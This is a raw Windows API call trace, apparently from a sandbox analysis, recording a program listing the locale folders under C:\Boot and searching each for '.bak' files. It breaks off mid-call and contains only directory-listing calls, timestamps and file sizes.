(in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0155.907] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.907] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.907] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.907] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0155.907] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.052] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.052] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.053] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.053] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.053] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.053] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.053] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.054] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.055] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.055] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.055] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.056] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb160, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.056] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.056] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.056] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.057] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.058] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.058] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.058] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.058] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.058] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.059] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.060] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.060] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.060] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.061] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb560, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.061] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.061] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.061] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.062] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.062] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.062] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.062] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.063] FindFirstFileW (in: lpFileName="C:\\Boot\\en-GB\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.063] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.069] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.070] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.070] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.070] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.070] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0156.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.071] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.072] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.072] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb358, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.072] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0156.072] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0156.072] FindFirstFileW (in: lpFileName="C:\\Boot\\es-MX\\*", 